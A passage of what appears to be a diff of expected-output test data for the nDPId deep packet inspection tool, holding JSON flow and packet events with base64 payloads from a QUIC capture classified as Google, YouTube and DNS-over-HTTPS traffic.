x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433390651,"flow_last_seen":1621433390651,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433390651,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":58414,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433411827,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1621433411827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433411827,"pkt":"AAAAAAAAAAEASYHhCABFAAVixWVAAH4RXjKokEAFEOjade+dAbsFTkGKyP8AAB0ID6UbviYe1OcAAEU0lEpFVo61ttZD0\/Guo\/jnAnR9jv+k5pAvfeBeOWD6Cm8zeiN4ecxHXQbeJAslmDKkgnaApPPGNJshgoi7VzHr\/rv4f991MIah9Z0x3iwrLSqHm+jIfLQxfiAPFuB9rLMf4f5yjsUpTl7yYpryWfDoVmV2zU2awpg5MyVbMiWeuULv\/hrjEOVgd6zoPwwK5dF1RV\/wrIcyIIMUpE+r5n8s58GUzUdN3AhPEbNnKhRwC6RWrqA+i0cqa8ctZWlgocKvytYgiqCsqMVO3NdyZSTFiTuNzFYJLpfFCUzIPf63hLzpNqbjK63qqYHIxdtHDARFoPxNzOgrVier\/q2WjzxC+M6mQi+H2pqwgvmMAlvMEtDd1ZlAWkzOl4G\/oReq\/ToNk7RekeRqvxLV\/VeSMXbYuQGNbpu2wr1Wxl6BibYf\/79Z3rObQtiyM19RxMxp7mdvUcLeIhqREsWiAfd+i1zPeTFCw+TQxI+c7b8r8\/XfC6A0KPfbtIIopv4Md8ZWbT8evvkG1J7aQcX8LESarYbxGnYGbIKbRvieAyXupa9DNkt5ydiaOWNMWmnYatZS7q+vJrXn89FucDVT03eSB8\/l5O5rpocuX6dFZiCeqampgTCdr3kOlnlcPHHqJr+VaFY4vr5Xyh5EHsikjEWIGozPdc7jEZtWf3uYTyNQsjZBZgpnS7YJW7nOT2DjNWT0GWwr0Ic1PXuo8I2w5qSUux7ny0enp7B\/26GObK7DIsMjzFG8UHaQBBmT\/Gf6mdO5kccDPkmAWHe0oXsNPt7\/TmoB8HTzqmFM3q5jiptukUvnl6h3hrA4tDcWF6r6\/VaXFDgQChkQm\/m5WrQEKH+KSIIwCREIKBUb3xaKQEJM4DmC+PDjOpNX2TtmlEUfuimAq0RFbxofd+ZiNjHaNh9WW79+yMMNubGxcKaeiIUpxvvl+n8zGFM11cyoFugluYbAi8iHUHh3Cjjf9i8p\/JBp8Lwsqt8GOKWBoZr8Pv9Qwx\/yhIn9+hyt75NZceSkQPB2HilwbRmKH9ZWN1RLraLSCDjLFZUoXLSdJR3\/RNAs+0evfZVDyjhtDb9Eybgu7J\/eCdLlS3X6ZW+L84u+0SQDGVf6Ood3an8Co1tUKtWj0PhIkidMAwm1PT4EdcGZ0Og4+2sY64xmsHSK3dYm3M1QvEAwoRAl7F2yqmYCv7brxvtZjAJQRQ+SvKtUx9c5gyIckMAAQPNHHrAiKGz7YZtDQNhcaxQR3kHPlUSzEMcAKMY1RR7CN\/pSeooHbHeCdnLpRnly2OT\/HcsGFzOvorJJhV2IGzqc5eU85yleqWqGU4sEQpVrPVOXIbwh\/xWWQ3840ZM2zRH5KGNip5J0esfDT3r1uD4+AX0TrvlQvBmkVKYVu8\/Dc9JFMO8ks11koiARJyBa1p\/sYHKBx1429RrmPqPI1XGKrymUtfQLC1CjqDyMOcxMqXqHjOsV2W9Oe3
aLqW0jqS4duUkIT45+NWUAEWQ5dcCvojudybcgB4i60UXLIJevToJ3JBxhaiZ0CBRlMiKqo7D27zgr1XJAjPS+feRSz+BJmxsqmY7bE7m7oRlxsN1qe0wj+Y+9szslqshgyS2A5FJDMEnvbShUgke31IlErYOEjA3M5ysDeUu5PO3ZaH7U9PkLACney3E6ldmC+Nm2iaW6IcjlkqsHCdTehMCOgQeKjiT8gNfoQUi0sDE1nb57Dfx6ucdbSEHW6ULrwjrSydeaPhk7\/b\/ZyzdR5QbL\/8bpPlib01D2Ts9qawYdi2FBumvw"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433411827,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r9---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433411827,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": 
{"client_requested_server_name":"r9---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433443702,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1621433443702,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433443702,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+6RAAH4RF2OokEAFcfqJ891rAbsFTomjw\/8AAB0IUmuY6nOze38ANwCN5aNI0Jhzv9NOMh\/1sz8Pq4SZBhXzrMMmdjZzrQgjx1zkkutKHQB1oDFT8L80Z4Aw8jSNx3hE\/Zw\/laqqIbhk2h4AYI8E2Ksg3Sfl+5RD5Qe9ekCyVbSOIn\/RQGKQ+Ysrz4swQWQlQaC+KtSVXMe3vllDuG\/jjZv8zSYZWp4V2dx8qPMZPOw3vPgkM\/WcagE5PucdMP+3itniSXOFzVDdgXKq5nmt+7yYD1XqERMNH7mUp+JRrWe4XHV7cKX02FgoGRmWOpxUJWFf7LJEmXiGcbi7Y0jE\/h\/OYXsowiB1squTTDTuQqDqWuYNEAOZV9SOZp2L7pqHnGTE9iJVdZW+JFE20DbZCic3DVlzGwLNvFMykQy2R19YE9TfCuZrbfxU0FPlLGpo5fIWWWvDAVoqbqVmZqEGwcTHzgV8Yz9EUd9TKsk+pq6On9FaEMp9uqGWWwnxo3eZj0TPa3FIym2Jcz1rAVeaoddUuSsIGRkpmLUnVQPtQlzkUneg+9hSBIQzKf0B4JD4gK60cQ+wEib\/Mlb2svj8AwuMbD42dbbUAldY8vdc2R6SBT7hjpHRBMRK\/23CtpazJepPZW9T
aqY1KH0Tz\/rdqetAkIpplEYk8d\/g9AITDWSrF8e6zya2TMq79ase5qJDl1I7B2BaCwE6uBrcM3YNywAaodudS6yBo7OBmzBJLhjcpawpG1VBepprPrMyQKdKRaLIppfRPMpB1zNwIz1B\/b0n29UJhF6mBe0rd\/G89yqhkXZrgizvDrWltB8tOP9SBV2j6Lu0+wAsCdQXImvD3VUPci4NZs5GU7Vvk\/ru8p8qVRhy1G9PMoV9S29kH3cyerovTX6XCRqhXT7LjRT227GeRmtu3e6LKmxiCSV16aoE86qsn7s15ede43yipjlcC2hBClsbMTb2sd2VPU5sjNA7FNWxGPJemWAv1BZza5EgN49CYT43mq\/jV+DKvYykpvXjR7AtKXJDZ6Sjxau21\/2SoAW9fknYkCMN\/b6sBb\/fb2UpjRQ7vtJeLKXxg6xRmaSy02gAXGTje9zcd4wsNhHKa5efII9Ck1SaDqkDwzSlV1MgZYsboWuDhaRPboyD3HUhtACz7J+Y3TYKG8hOhjZ4ZCZgGjHzNSe75OGW465v+X67ja\/0mNh37VVVzJ8W2qxkDcAd6QHJT+qyXR64+O7B10B7DO9voZAqB4B7NmlTjFKRebbQu57q54zPuFHoi5ShAmQQ9UaPbGtA3CwzY355cHS0TvLRROOxD2CS17paHw+jZFFnHn5LXH6snBlWaDVhRzqR\/YYGoi4d\/7LIG+yhTFvXfp4vXRdxfwTSW\/47XWHABPYfJ6vXmF0ZlSVMGkkiLOES0NuVRKMFyi4Xev+x7I5SlwVCu+Rvq8DSRF1MfjOJeMPXW0T\/Ekz0FDO4mP35HA\/3PeK18zuOlO37CdOsUXKnqLocCevQv9jz5q7vVxas6jE8BkD4uQY8aeyRiiKzeZh2\/lVon6R7IS4sMXdz1t4wPZr1ILCy8wM7LjPHggzpJxmfuu9E7qlOH406tiQeyFo7FY1H2GOapGdOKVftFin6pO7IjV88AyDx+yPUwuSKzmoqNi6P6VAErvOi4bRjw\/kYQg9LGmC02XKMWGdyW3mVcI\/8x\/3TkI4csH2+tr+BfT74D5aoqvH+ZJSLn0rurteuEBkZW2fndLeNUkyWzU015vCQoZJqvTClWmVcG9CLZn2rbyhXrUHNKkVJ+wn4ARFcIHQUVc7egurai3mUfPedLQU\/iDA4\/fPb"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433443702,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev 
Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433443702,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1621433521961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433521961,"pkt":"AAAAAAAAAAEASYHhCABFAAViy8RAAH4RV9OokEAFEOjadfy8AbsFThT+z\/8AAB0IhJNYKtANuoMANwBQeqOywn67qncKSnTvuagILGVnNcalwuzGeiHpkW\/r3QudQ1Xg+atf32S0lvogd+2\/QThXrAhE\/UcbE6\/9d3ne8M3mBUbLc5y01PqU2r3V84i6i2XGKABZLB+Bshg3DGbuuyaaRbJCJtO6TLBrd9b6D0pWzrZ8i\/Gz8PAIyMOtI5BQl03yZpQuNeBtefp5qB7VZ9vAjNbT9Fi4jMJzpK4LOjIjHvho5UD9A1tQPssWUuiaB6ShmA41Ky2YyAUYb6Vh9rcHTQmUf36RXRjnMENcqSJ0txZ5HLa+JL\/wc7MLe4cFuMGhbo5QOrIDZl0OqxsRLbUuyHXXUj9iT0oZwwV9OPcMhzRgBCvFYPYmfISQRYW788jLzx1jI6Om66CAeI+GlZoG8XjCWvwTBZh4\/jd+ih5NAhEs\/yPoFHJAITJIoFzfVRs\/ZlaeaD21dhSdkLyQXvL6YrShajAQAL8QQuvvPxp1O9trw\/J1Y0yCHlbqft4HIR8bieoeKqFBtn8Vf4OzAvdIKL73M4BelKj2NgPZYdKz8+ZqUObz8td1TnEc2GZAidUp2ZVWI5XtiTBVv6\/1haOTwC\/f72jS66IjYphHkAjFY9qrDEJPRir2QNSQmatmWbaYhNe+qzzpKOsUSXAhbo1oQcAl+l2H9vJ\/DIQa\/AxSESBrwxGM4fWVLKqEAfMznZCtqu5fIZYleZVlEdE5C6lkvCY2W3xT+YJ1bOncdsHPT\/WGTsfc2kcqrsadebK7YP96vtKb5\/Kwjr0TCYEIvC8vfon2QAbzWY\/JCGhSEYUqb+8HgxwXZ9GWYITX\/BiqiLCdU8Aq6m\/J2oBNQp41WFXol9NeIYQ\/ENO\/iD4I\/DEE\/++\/78B3gyY1sn1rZXJOK0OaZecB3oIp5CHb8DPBBomL5i+kCg55mQYZXdBZu+\/tPycOr6KZl91KRXD7Z7TalELPSIUYpOBkmxHSZ2pvbUBnFHUY\/pw8Iwss0KbgupzZx7PD0GBpeEIyl45N0\/CmlN9QuyhgtpFSdG76LgGZLszlzyntz5P0kwUusECVbIv+39Djz82FK54YD4N+JgQBI2jcM5Zrwk2YhbYd9NpBrDQWUXA9bJsyou+uE1gnkTh+CuICnZY1UDepbEYOVkXeD6R6MgAu0d03kX9pBp4HBB2snNUvQ2Oyw65UsJhUcink0Bfa6N1+jzB8j4NevywJoM\/frbsYzOsqLw3giaa6WuLFmKpE+IZ10TEjlyFlcukcQlZ+NNObDfykNCzzBy0AcMVQaUSbjFM9ZqN+w532wfhRNhL\/F83rzAuxIgJ0n7kuWgx1Jmzauv+GuAQAe\/Uw+HEgG6V+kg9JoZLVZYLKoIXp7Z\/RGXpWG6+88\/QUBnYEjIVJi3NA4jv6spgUguU8hnlk0dwaGaTgDd+E3pAJh1qiy6G4I6\/yNiu8puzdQ2UZXW5DSLwiSIdluiR43lhltbHf\/
kT4ogbkuhAZhjh\/hPFlOMFqyWyJNLdSoLKPFvtXO5THZjGcQf64KDQ+Abf7vsxCS6V\/yIHUSA+iidaY5kvUUh1iHjGk0QAUUnvwTyQXCrz5Lw8M0X\/+XryPxtPTET5dAXJHe7twTSv+4wTKnufI1RxQCzNHd\/d8PrkscC7FBMhp5+jPQuyuCQJrAnnf4c5Q9OIbgJM125\/9n8YnDbNwguEGB0mPAkvI3jKFLHb1CFQcgY8kEl\/0mjy6bPZdm5nVzmX0ouDvUmiEZcGPawl5Bk3IHTCTM4+6WoZMUTAFfn6ItnEi7vfqWVc34jJvA3AQ"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r9---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 
+00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r9---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} 
+00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 
00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433567521,"flow_last_seen":1621433567521,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433567521,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1621433567521,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433567521,"pkt":"AAAAAAAAAAEAS1QMCABFAAViYR1AAH4R+pqokEAFCUGp\/O4IAbsFTmqmwP8AAB0IrIdSuCmx8q8ANwCDdz03IhzUFn1L2Cnpzs\/TwSm2cofJpAX1JkTV3tCerbt47eBb\/tUYyv\/WG3oeaZXUGjSRmm5E\/S\/GHWDf3uofFcje7iOy\/NYB5qLognHXVD5g33k5Wi4OmgM+Ahmi4KhHeG3d2\/spKvCfjAjis75+5oGyetUb7SiO95JzfsedF3RaUE6Kj3rwNnMmnCLJJ1LfhDj1pFKjuI2YJh+71nHR\/BoSscicrqHnjNU+Kt5JysJR0+jE4LPT9l2mVbtuLkLis0xTseEMrQ66AbQ4UFQMzyqQWI6Ys9FFItz+0act2NE2Wbofw\/Lrumq\/k5f6prAdUO5v4cjZt\/R7aWcFen8a7KkWTJ\/7yg4CnjBGZeWmAF\/5X52U3x\/RCCkPoodlYLAoeE7zSZyzafp9Vs3xFNlJ9K08Ckfsw+JGyo11cIH+HtRX65c3vvT6RM+bJMwm4UScJkC6c7MPFESBou22UrxOHjl8NrD0kEu\/qLl4tdQbrTpkmURNF2JKrG1jx1\/Vfcu5uH+lsNbc4u2wpjBtpNr8b07\/1E6ftbBeGWLBOlfhvQxQUPiyD5FRgm3uDcodf1gX7fecwIzaijpGJiX6c2KBmWcNDAQ\/RbOf9+2e76hRJtul2\/BURpdz9zqqRcD4sx424KomOinx8opVJjXft4bXUEWmwuefm1\/MbxOXPv2RyHg9XMH3qoObK7PP8PiRDpbbi6LB0oS1AIUBop\/TsnEOwwab4fl60FNiCev7ICz8OTrnAs6or6No9QC4mHJiNDT\/A5vVLmzT+Z9Dqu6BSr\/JaA6a6DJxfKrQLEYyFN+mAQST11uNp+VnLp1My1clYT++r
